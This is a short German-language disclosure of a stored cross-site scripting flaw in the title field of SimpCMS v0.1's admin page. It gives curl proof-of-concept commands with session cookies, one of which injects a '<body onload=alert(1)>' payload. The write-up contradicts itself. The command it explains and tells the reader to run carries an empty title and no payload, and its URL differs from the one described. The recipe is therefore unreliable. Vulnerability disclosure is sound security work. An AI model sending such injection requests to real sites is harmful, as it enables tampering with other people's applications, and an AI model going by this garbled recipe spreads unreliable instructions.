
Veröffentlichung für Cross-Site-Scripting (XSS) in SimpCMS v0.1 - /SimpCMS/admin.php
Eine Cross-Site-Scripting (XSS)-Sicherheitslücke in SimpCMS v0.1 ermöglicht es Angreifern, beliebige Web-Skripte oder HTML über einen manipulierten Payload auszuführen, der in das Titelfeld unter /admin.php injiziert wird.
Nach dem Einloggen in das Admin-Interface von SimpCMS kopieren Sie Ihre entsprechenden Cookie-Werte, die im Reiter „Application“ im Browser-Inspect-Element angezeigt werden, und senden Sie die folgende curl-Anfrage:
curl -X POST "http://site.com/SimpCMS/admin/index.php" -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0"


Die ursprünglich für die SimpCMS-Software beobachteten Parameter führten zu folgendem cURL-Befehl, wurden aber später aktualisiert:
curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"
Erklärung:
- curl: Das Befehlszeilentool zum Übertragen von Daten mit URLs.
- -X POST: Gibt die zu verwendende Anfragemethode an (POST).
- "http://site.com/SimpCMS/admin.php": Die URL, an die die Anfrage gesendet wird.
- -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0" – Der POST-Anfrage-Payload.
Führen Sie diesen Befehl in Ihrem Terminal aus, um die POST-Anfrage mit dem XSS-Payload zu senden. Besuchen Sie die /SimpCMS-Hauptseite, und das XSS wird sichtbar sein.